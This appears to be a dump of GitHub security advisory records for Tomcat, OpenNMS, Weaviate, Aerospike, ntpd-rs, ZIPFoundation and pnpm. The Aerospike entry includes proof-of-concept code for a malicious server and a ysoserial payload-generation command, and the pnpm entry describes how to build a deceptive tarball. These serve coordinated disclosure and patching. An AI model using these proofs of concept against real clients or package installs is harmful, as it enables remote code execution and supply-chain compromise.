[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.80'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.93'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.93'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.80'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M11'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41080'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/4998ad745b67edeadefe541c94ed029b53933d3b'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/77c0ce2d169efa248b64b992e547aad549ec906b'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/bb4624a9f3e69d495182ebfa68d7983076407a27'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/e3703c9abb8fe0d5602f6ba8a8f11d4b6940815a'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230921-0006/'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T22:05:01Z', 'nvd_published_at': None}
1.4.0
GHSA-w5gq-xrrp-3fxf
2023-08-21T19:33:09Z
2023-08-14T18:32:59Z
null
['CVE-2023-0872']
OpenNMS privilege elevation vulnerability
The Horizon REST API includes a users endpoint in OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp-rest'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0872'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6354'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/e59b0ddd164cf0598ac0294d11a2d677d9e310b8'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/horizon/32/releasenotes/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:00Z', 'nvd_published_at': None}
1.4.0
GHSA-8697-479h-5mfp
2023-08-24T21:49:43Z
2023-08-22T18:03:13Z
null
['CVE-2023-38976']
Weaviate denial of service vulnerability
### Impact This vulnerability is a type conversion issue that affects users of Weaviate Server versions 1.20.0 and earlier. Who is impacted: Users of Weaviate Server versions 1.20.0 and earlier are impacted by this vulnerability. ### Patches A patch has been developed for this vulnerability. Patch releases 1.20.6, 1.19.13, and 1.18.6 are fixing this vulnerability in each respective minor version release. Users are strongly recommended to upgrade to one of these patched versions to address the vulnerability. Keeping software up-to-date is crucial to avoid security vulnerabilities. ### Workarounds There are no known workarounds to fix or remediate this vulnerability without upgrading. Users must upgrade to a patched version to mitigate the risk. ### References * https://github.com/weaviate/weaviate/releases/tag/v1.18.6 * https://github.com/weaviate/weaviate/releases/tag/v1.19.13 * https://github.com/weaviate/weaviate/releases/tag/v1.20.6
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/security/advisories/GHSA-8697-479h-5mfp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38976'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/issues/3258'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/pull/3431'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/commit/2a7b208d9aca07e28969e3be82689c184ccf9118'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaviate/weaviate'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.18.6'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.19.13'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.20.6'}]
{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T18:03:13Z', 'nvd_published_at': None}
1.4.0
GHSA-jj95-55cr-9597
2023-08-08T22:15:13Z
2023-08-03T19:45:39Z
null
['CVE-2023-36480']
Aerospike Java Client vulnerable to unsafe deserialization of server responses
# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044` The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [Aerospike Java Client](https://github.com/aerospike/aerospike-client-java/). We are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-044` as a reference). If you are _NOT_ the correct point of contact for this report, please let us know! ## Summary The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. ## Product Aerospike Java Client ## Tested Version [6.1.7](https://github.com/aerospike/aerospike-client-java/releases/tag/6.1.7) ## Details ### Issue: Unsafe deserialization of server responses (`GHSL-2023-044`) The Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the `NettyCommand` class. This class includes an `InboundHandler` that extends Netty's `ChannelInboundHandlerAdapter`, which handles inbound data coming from the Netty channel established with the server. This is implemented in the `channelRead` method: [`client/src/com/aerospike/client/async/NettyCommand.java:1157`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157) ```java @Override public void channelRead(ChannelHandlerContext ctx, Object msg) { command.read((ByteBuf)msg); } ``` The incoming `msg` object is handled by the `NettyCommand.read` method, which behaves differently depending on the `state` variable. Several states produce paths to the vulnerable code — for instance, we will follow the path through `AsyncCommand.COMMAND_READ_HEADER`: [`/client/src/com/aerospike/client/async/NettyCommand.java:489`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489) ```java private void read(ByteBuf byteBuffer) { eventReceived = true; try { switch (state) { // --snip-- case AsyncCommand.COMMAND_READ_HEADER: if (command.isSingle) { readSingleHeader(byteBuffer); } // --snip-- } // --snip-- } // --snip--- } ``` Some bytes are read from the message buffer and saved in `command.dataBuffer` in the `readSingleHeader` method, after which `parseSingleBody` is called: [`client/src/com/aerospike/client/async/NettyCommand.java:596`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596) ```java private void readSingleHeader(ByteBuf byteBuffer) { int readableBytes = byteBuffer.readableBytes(); int dataSize = command.dataOffset + readableBytes; // --snip-- byteBuffer.readBytes(command.dataBuffer, 0, dataSize); command.dataOffset = dataSize; if (command.dataOffset >= receiveSize) { parseSingleBody(); } } ``` `parseSingleBody` simply delegates on `AsyncCommand.parseCommandResult`, which unless the message is compressed, directly calls `AsyncCommand.parseResult`. The implementation of this method depends on the command type. For an `AsyncRead` command, we have the following: [`client/src/com/aerospike/client/async/AsyncRead.java:68`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68) ```java @Override protected final boolean parseResult() { validateHeaderSize(); int resultCode = dataBuffer[dataOffset + 5] & 0xFF; int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6); int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10); int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18); int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20); dataOffset += Command.MSG_REMAINING_HEADER_SIZE; if (resultCode == 0) { // --snip-- skipKey(fieldCount); record = parseRecord(opCount, generation, expiration, isOperation); return true; } ``` It can be seen that several fields are read from the message's bytes, and then a call to `Command.parseRecord` happens: [`client/src/com/aerospike/client/command/Command.java:2083`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083) ```java protected final Record parseRecord( int opCount, int generation, int expiration, boolean isOperation ) { Map<String,Object> bins = new LinkedHashMap<>(); for (int i = 0 ; i < opCount; i++) { int opSize = Buffer.bytesToInt(dataBuffer, dataOffset); byte particleType = dataBuffer[dataOffset + 5]; byte nameSize = dataBuffer[dataOffset + 7]; String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize); dataOffset += 4 + 4 + nameSize; int particleBytesSize = opSize - (4 + nameSize); Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize); ``` `Buffer.bytesToParticle` converts the remaining bytes in the data buffer depending on the `particleType` field. We're interested in the `JBLOB` case: [`client/src/com/aerospike/client/command/Buffer.java:53`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53) ```java public static Object bytesToParticle(int type, byte[] buf, int offset, int len) throws AerospikeException { switch (type) { // --snip-- case ParticleType.JBLOB: return Buffer.bytesToObject(buf, offset, len); ``` In `bytesToObject`, the deserialization of an object from the message bytes happens: [`client/src/com/aerospike/client/command/Buffer.java:300`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L300) ```java public static Object bytesToObject(byte[] buf, int offset, int length) { // --snip-- try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) { try (ObjectInputStream oistream = new ObjectInputStream(bastream)) { return oistream.readObject(); } } // --snip-- } ``` NOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in `Unpacker.unpackBlock`: [`client/src/com/aerospike/client/util/Unpacker.java:227`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227) ```java private T unpackBlob(int count) throws IOException, ClassNotFoundException { // --snip-- case ParticleType.JBLOB: // --snip-- try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) { try (ObjectInputStream oistream = new ObjectInputStream(bastream)) { val = getJavaBlob(oistream.readObject()); } } ``` This vulnerability was discovered with the help of [CodeQL](https://codeql.github.com/). #### Impact This issue may lead to Remote Code Execution (RCE) in the Java client. #### Remediation Avoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML. However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder. Alternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures. #### Resources To exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client's examples with the `-netty` flag, specifically the `AsyncPutGet`, which uses an `AsyncRead`. The examples point to `localhost:3000` by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the `AsyncRead` command happens. Then, our server injects the malicious response: ```java public class AttackChannelHandler extends SimpleChannelInboundHandler<String> { @Override protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception { // --snip-- if (s.getBytes()[7] == 0x44) { AttackMessage m = new AttackMessage( Files.readAllBytes(Paths.get("location/of/deserialization/payload.bin"))); ctx.channel().writeAndFlush(m); return; } // --snip-- } } ``` `AttackMessage` is a class that hardcodes the necessary data to deliver the payload: ```java public class AttackMessage { private byte resultCode = 0; private int generation = 2; private int expiration = 417523457; private short fieldCount = 0; private short opCount = 1; private byte particleType = 7; private String name = "putgetbin"; private byte[] payload; public AttackMessage(byte[] payload) { this.payload = payload; } // --snip-- (getters) public int[] getSize() { int size = 30 + name.length() + payload.length; int low = (byte) (size & 0xFF); int high = (byte) (size >> 8) & 0xFF; return new int[] {high, low}; } public int getOpSize() { return payload.length + 4 + name.length(); } public byte[] getPayload() { return payload; } } ``` And it's finally encoded and delivered to the client through the network using a `MessageToByteEncoder` from Netty: ```java public class AttackMessageEncoder extends MessageToByteEncoder<AttackMessage> { @Override protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out) throws Exception { // header out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00}); int[] length = msg.getSize(); out.writeByte(length[0]); out.writeByte(length[1]); out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00}); out.writeByte(msg.getResultCode()); out.writeInt(msg.getGeneration()); out.writeInt(msg.getExpiration()); out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00}); out.writeShort(msg.getFieldCount()); out.writeShort(msg.getOpCount()); out.writeInt(msg.getOpSize()); out.writeByte(0x01); out.writeByte(msg.getParticleType()); out.writeByte(0x00); out.writeByte(msg.getName().length()); out.writeCharSequence(msg.getName(), Charset.defaultCharset()); out.writeBytes(msg.getPayload()); } } ``` The specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget: ```xml <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> ``` In which case, the malicious payload file could be generated using [`ysoserial`](https://github.com/frohoff/ysoserial) as follows: ``` java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 '/System/Applications/Calculator.app/Contents/MacOS/Calculator' > payload.bin ``` ## GitHub Security Advisories We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory). ## Credit This issue was discovered and reported by the GitHub CodeQL team members [@atorralba (Tony Torralba)](https://github.com/atorralba) and [@joefarebrother (Joseph Farebrother)](https://github.com/joefarebrother). ## Contact You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-044` in any communication regarding this issue. ## Disclosure Policy This report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36480'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900'}, {'type': 'PACKAGE', 'url': 'https://github.com/aerospike/aerospike-client-java'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227'}, {'type': 'WEB', 'url': 'https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:45:39Z', 'nvd_published_at': None}
1.4.0
GHSA-37xq-q42p-rv3p
2023-08-24T22:18:39Z
2023-08-24T22:18:39Z
null
[]
ntpd has Dependency on Vulnerable Third-Party Component
### During startup, an attacker that can man-in-the-middle traffic to and from NTS key exchange servers can trigger a very expensive key validation process due to a vulnerability in webpki. ### Impact This vulnerability can lead to excessive cpu usage on startup on clients configured to use NTS ### Patches Affected users are recommended to upgrade to version 0.3.7 ### References See also https://github.com/rustsec/advisory-db/blob/main/crates/rustls-webpki/RUSTSEC-2023-0053.md
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'ntpd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/security/advisories/GHSA-37xq-q42p-rv3p'}, {'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/commit/927952a440176a18f3ded132eb831ae7f7ac5c00'}, {'type': 'PACKAGE', 'url': 'https://github.com/pendulum-project/ntpd-rs'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/blob/main/crates/rustls-webpki/RUSTSEC-2023-0053.md'}]
{'cwe_ids': ['CWE-1395'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:18:39Z', 'nvd_published_at': None}
1.4.0
GHSA-c2cc-3569-6jh2
2023-09-06T21:05:41Z
2023-08-31T00:30:17Z
null
['CVE-2023-39138']
Path traversal in ZIPFoundation
An issue in ZIPFoundation v0.9.16 allows attackers to execute a path traversal via extracting a crafted zip file.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/weichsel/ZIPFoundation'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.16'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39138'}, {'type': 'WEB', 'url': 'https://github.com/weichsel/ZIPFoundation/issues/282'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/weichsel/ZIPFoundation'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-4'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-6'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:44:43Z', 'nvd_published_at': None}
1.4.0
GHSA-5r98-f33j-g8h7
2023-08-01T17:00:55Z
2023-08-01T17:00:55Z
null
['CVE-2023-37478']
pnpm incorrectly parses tar archives relative to specification
### Summary It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. ### Details The TAR format is an append-only archive format, and as such, the specification for how to update a file is to add a new record to the end with the updated version of the file. This means that it is completely valid for an archive to contain multiple copies of, say, `package.json`, and the expected behavior when extracting is that all versions other than the last get ignored. This is further complicated by that during tarball extraction, all package managers are configured to drop the first path component, so collisions can be created simply by using multiple root folders in the archive, even without performing updates. When pnpm extracts a tar archive via tar-stream, it appears to extract only the _first_ file of a given name and discards all subsequent files with the same name. ### PoC Create a root folder with the following layout: - `a/package.json` - `package/package.json` - `z/package.json` File contents: #### a/package.json ```json { "name": "test-package", "version": "0.1.0", "description": "This is a bad version of a test package", "dependencies": { "react": "^15" } } ``` #### package/package.json ```json { "name": "test-package", "version": "0.1.0", "description": "This is a bad version of a test package", "dependencies": { "react": "^16" } } ``` #### z/package.json ```json { "name": "test-package", "version": "0.1.0", "description": "This is the good version of a test package", "dependencies": { "react": "^17" } } ``` Then use the tar binary to produce a tarball (working directory is the root folder): `tar -c -z --format ustar -f package.tgz a package z` The order of the folders at the end matters; whichever one is last will end up being the package.json that wins when extracted by npm; the one that is first will be the one that wins when extracted by pnpm. Install the tarball via the `file:` protocol. Observe that with npm, the lockfile has `react@17`, while with pnpm it has `react@15`. ### Impact This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'pnpm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/exe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linuxstatic-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/cafs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'pnpm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/exe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linuxstatic-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/security/advisories/GHSA-5r98-f33j-g8h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37478'}, {'type': 'PACKAGE', 'url': 'https://github.com/pnpm/pnpm'}, {'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/releases/tag/v7.33.4'}, {'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/releases/tag/v8.6.8'}]
